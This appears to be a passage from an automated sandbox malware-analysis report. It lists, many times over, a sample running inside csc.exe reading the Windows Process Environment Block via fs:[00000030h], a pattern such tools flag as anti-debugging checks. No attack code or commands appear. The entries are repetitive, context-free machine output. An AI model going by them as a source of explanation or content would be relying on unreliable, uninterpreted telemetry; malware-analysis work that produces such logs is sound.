          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9666D mov esi, dword ptr fs:[00000030h]3_2_05C9666D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9666D mov eax, dword ptr fs:[00000030h]3_2_05C9666D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9666D mov eax, dword ptr fs:[00000030h]3_2_05C9666D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C57662 mov eax, dword ptr fs:[00000030h]3_2_05C57662
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C57662 mov eax, dword ptr fs:[00000030h]3_2_05C57662
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C57662 mov eax, dword ptr fs:[00000030h]3_2_05C57662
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C73660 mov eax, dword ptr fs:[00000030h]3_2_05C73660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C73660 mov eax, dword ptr fs:[00000030h]3_2_05C73660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C73660 mov eax, dword ptr fs:[00000030h]3_2_05C73660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C60670 mov eax, dword ptr fs:[00000030h]3_2_05C60670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2670 mov eax, dword ptr fs:[00000030h]3_2_05CA2670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2670 mov eax, dword ptr fs:[00000030h]3_2_05CA2670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9360F mov eax, dword ptr fs:[00000030h]3_2_05C9360F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF3608 mov eax, dword ptr fs:[00000030h]3_2_05CF3608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF3608 mov eax, dword ptr fs:[00000030h]3_2_05CF3608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF3608 mov eax, dword ptr fs:[00000030h]3_2_05CF3608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF3608 mov eax, dword ptr fs:[00000030h]3_2_05CF3608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF3608 mov eax, dword ptr fs:[00000030h]3_2_05CF3608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF3608 mov eax, dword ptr fs:[00000030h]3_2_05CF3608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8D600 mov eax, dword ptr fs:[00000030h]3_2_05C8D600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8D600 mov eax, dword ptr fs:[00000030h]3_2_05C8D600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D34600 mov eax, dword ptr fs:[00000030h]3_2_05D34600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D1F607 mov eax, dword ptr fs:[00000030h]3_2_05D1F607
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C65622 mov eax, dword ptr fs:[00000030h]3_2_05C65622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C65622 mov eax, dword ptr fs:[00000030h]3_2_05C65622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C67623 mov eax, dword ptr fs:[00000030h]3_2_05C67623
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9C620 mov eax, dword ptr fs:[00000030h]3_2_05C9C620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C60630 mov eax, dword ptr fs:[00000030h]3_2_05C60630
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C90630 mov eax, dword ptr fs:[00000030h]3_2_05C90630
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0D62C mov ecx, dword ptr fs:[00000030h]3_2_05D0D62C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0D62C mov ecx, dword ptr fs:[00000030h]3_2_05D0D62C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0D62C mov eax, dword ptr fs:[00000030h]3_2_05D0D62C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CE8633 mov esi, dword ptr fs:[00000030h]3_2_05CE8633
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CE8633 mov eax, dword ptr fs:[00000030h]3_2_05CE8633
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CE8633 mov eax, dword ptr fs:[00000030h]3_2_05CE8633
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C701C0 mov eax, dword ptr fs:[00000030h]3_2_05C701C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C701C0 mov eax, dword ptr fs:[00000030h]3_2_05C701C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C751C0 mov eax, dword ptr fs:[00000030h]3_2_05C751C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C751C0 mov eax, dword ptr fs:[00000030h]3_2_05C751C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C751C0 mov eax, dword ptr fs:[00000030h]3_2_05C751C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C751C0 mov eax, dword ptr fs:[00000030h]3_2_05C751C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C691E5 mov eax, dword ptr fs:[00000030h]3_2_05C691E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C691E5 mov eax, dword ptr fs:[00000030h]3_2_05C691E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6A1E3 mov eax, dword ptr fs:[00000030h]3_2_05C6A1E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6A1E3 mov eax, dword ptr fs:[00000030h]3_2_05C6A1E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6A1E3 mov eax, dword ptr fs:[00000030h]3_2_05C6A1E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6A1E3 mov eax, dword ptr fs:[00000030h]3_2_05C6A1E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6A1E3 mov eax, dword ptr fs:[00000030h]3_2_05C6A1E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B1E0 mov eax, dword ptr fs:[00000030h]3_2_05C8B1E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B1E0 mov eax, dword ptr fs:[00000030h]3_2_05C8B1E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B1E0 mov eax, dword ptr fs:[00000030h]3_2_05C8B1E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B1E0 mov eax, dword ptr fs:[00000030h]3_2_05C8B1E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B1E0 mov eax, dword ptr fs:[00000030h]3_2_05C8B1E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B1E0 mov eax, dword ptr fs:[00000030h]3_2_05C8B1E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B1E0 mov eax, dword ptr fs:[00000030h]3_2_05C8B1E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C581EB mov eax, dword ptr fs:[00000030h]3_2_05C581EB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C591F0 mov eax, dword ptr fs:[00000030h]3_2_05C591F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C591F0 mov eax, dword ptr fs:[00000030h]3_2_05C591F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C701F1 mov eax, dword ptr fs:[00000030h]3_2_05C701F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C701F1 mov eax, dword ptr fs:[00000030h]3_2_05C701F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C701F1 mov eax, dword ptr fs:[00000030h]3_2_05C701F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8F1F0 mov eax, dword ptr fs:[00000030h]3_2_05C8F1F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8F1F0 mov eax, dword ptr fs:[00000030h]3_2_05C8F1F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D281EE mov eax, dword ptr fs:[00000030h]3_2_05D281EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D281EE mov eax, dword ptr fs:[00000030h]3_2_05D281EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C64180 mov eax, dword ptr fs:[00000030h]3_2_05C64180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C64180 mov eax, dword ptr fs:[00000030h]3_2_05C64180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C64180 mov eax, dword ptr fs:[00000030h]3_2_05C64180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA1190 mov eax, dword ptr fs:[00000030h]3_2_05CA1190
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA1190 mov eax, dword ptr fs:[00000030h]3_2_05CA1190
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C89194 mov eax, dword ptr fs:[00000030h]3_2_05C89194
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D351B6 mov eax, dword ptr fs:[00000030h]3_2_05D351B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9E1A4 mov eax, dword ptr fs:[00000030h]3_2_05C9E1A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9E1A4 mov eax, dword ptr fs:[00000030h]3_2_05C9E1A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C941BB mov ecx, dword ptr fs:[00000030h]3_2_05C941BB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C941BB mov eax, dword ptr fs:[00000030h]3_2_05C941BB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C941BB mov eax, dword ptr fs:[00000030h]3_2_05C941BB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C931BE mov eax, dword ptr fs:[00000030h]3_2_05C931BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C931BE mov eax, dword ptr fs:[00000030h]3_2_05C931BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5A147 mov eax, dword ptr fs:[00000030h]3_2_05C5A147
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5A147 mov eax, dword ptr fs:[00000030h]3_2_05C5A147
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5A147 mov eax, dword ptr fs:[00000030h]3_2_05C5A147
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D33157 mov eax, dword ptr fs:[00000030h]3_2_05D33157
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D33157 mov eax, dword ptr fs:[00000030h]3_2_05D33157
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D33157 mov eax, dword ptr fs:[00000030h]3_2_05D33157
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF314A mov eax, dword ptr fs:[00000030h]3_2_05CF314A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF314A mov eax, dword ptr fs:[00000030h]3_2_05CF314A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF314A mov eax, dword ptr fs:[00000030h]3_2_05CF314A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CF314A mov eax, dword ptr fs:[00000030h]3_2_05CF314A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9415F mov eax, dword ptr fs:[00000030h]3_2_05C9415F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D35149 mov eax, dword ptr fs:[00000030h]3_2_05D35149
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9716D mov eax, dword ptr fs:[00000030h]3_2_05C9716D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CB717A mov eax, dword ptr fs:[00000030h]3_2_05CB717A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CB717A mov eax, dword ptr fs:[00000030h]3_2_05CB717A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C66179 mov eax, dword ptr fs:[00000030h]3_2_05C66179
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8510F mov eax, dword ptr fs:[00000030h]3_2_05C8510F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6510D mov eax, dword ptr fs:[00000030h]3_2_05C6510D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C90118 mov eax, dword ptr fs:[00000030h]3_2_05C90118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F113 mov eax, dword ptr fs:[00000030h]3_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C97128 mov eax, dword ptr fs:[00000030h]3_2_05C97128
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C97128 mov eax, dword ptr fs:[00000030h]3_2_05C97128
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D1F13E mov eax, dword ptr fs:[00000030h]3_2_05D1F13E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CEA130 mov eax, dword ptr fs:[00000030h]3_2_05CEA130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5B0D6 mov eax, dword ptr fs:[00000030h]3_2_05C5B0D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5B0D6 mov eax, dword ptr fs:[00000030h]3_2_05C5B0D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5B0D6 mov eax, dword ptr fs:[00000030h]3_2_05C5B0D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5B0D6 mov eax, dword ptr fs:[00000030h]3_2_05C5B0D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7B0D0 mov eax, dword ptr fs:[00000030h]3_2_05C7B0D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5C0F6 mov eax, dword ptr fs:[00000030h]3_2_05C5C0F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9D0F0 mov eax, dword ptr fs:[00000030h]3_2_05C9D0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9D0F0 mov ecx, dword ptr fs:[00000030h]3_2_05C9D0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C590F8 mov eax, dword ptr fs:[00000030h]3_2_05C590F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C590F8 mov eax, dword ptr fs:[00000030h]3_2_05C590F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C590F8 mov eax, dword ptr fs:[00000030h]3_2_05C590F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C590F8 mov eax, dword ptr fs:[00000030h]3_2_05C590F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D34080 mov eax, dword ptr fs:[00000030h]3_2_05D34080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D34080 mov eax, dword ptr fs:[00000030h]3_2_05D34080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D34080 mov eax, dword ptr fs:[00000030h]3_2_05D34080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D34080 mov eax, dword ptr fs:[00000030h]3_2_05D34080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D34080 mov eax, dword ptr fs:[00000030h]3_2_05D34080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D34080 mov eax, dword ptr fs:[00000030h]3_2_05D34080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D34080 mov eax, dword ptr fs:[00000030h]3_2_05D34080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5C090 mov eax, dword ptr fs:[00000030h]3_2_05C5C090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5A093 mov ecx, dword ptr fs:[00000030h]3_2_05C5A093
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D350B7 mov eax, dword ptr fs:[00000030h]3_2_05D350B7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA00A5 mov eax, dword ptr fs:[00000030h]3_2_05CA00A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D1B0AF mov eax, dword ptr fs:[00000030h]3_2_05D1B0AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D3505B mov eax, dword ptr fs:[00000030h]3_2_05D3505B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C90044 mov eax, dword ptr fs:[00000030h]3_2_05C90044
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C61051 mov eax, dword ptr fs:[00000030h]3_2_05C61051
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C61051 mov eax, dword ptr fs:[00000030h]3_2_05C61051
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D09060 mov eax, dword ptr fs:[00000030h]3_2_05D09060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C66074 mov eax, dword ptr fs:[00000030h]3_2_05C66074
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C66074 mov eax, dword ptr fs:[00000030h]3_2_05C66074
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C67072 mov eax, dword ptr fs:[00000030h]3_2_05C67072
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C85004 mov eax, dword ptr fs:[00000030h]3_2_05C85004
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C85004 mov ecx, dword ptr fs:[00000030h]3_2_05C85004
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C68009 mov eax, dword ptr fs:[00000030h]3_2_05C68009
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5D02D mov eax, dword ptr fs:[00000030h]3_2_05C5D02D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5C3C7 mov eax, dword ptr fs:[00000030h]3_2_05C5C3C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5E3C0 mov eax, dword ptr fs:[00000030h]3_2_05C5E3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5E3C0 mov eax, dword ptr fs:[00000030h]3_2_05C5E3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5E3C0 mov eax, dword ptr fs:[00000030h]3_2_05C5E3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C663CB mov eax, dword ptr fs:[00000030h]3_2_05C663CB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C933D0 mov eax, dword ptr fs:[00000030h]3_2_05C933D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C943D0 mov ecx, dword ptr fs:[00000030h]3_2_05C943D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CE43D5 mov eax, dword ptr fs:[00000030h]3_2_05CE43D5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C61380 mov eax, dword ptr fs:[00000030h]3_2_05C61380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C61380 mov eax, dword ptr fs:[00000030h]3_2_05C61380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C61380 mov eax, dword ptr fs:[00000030h]3_2_05C61380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C61380 mov eax, dword ptr fs:[00000030h]3_2_05C61380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C61380 mov eax, dword ptr fs:[00000030h]3_2_05C61380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7F380 mov eax, dword ptr fs:[00000030h]3_2_05C7F380
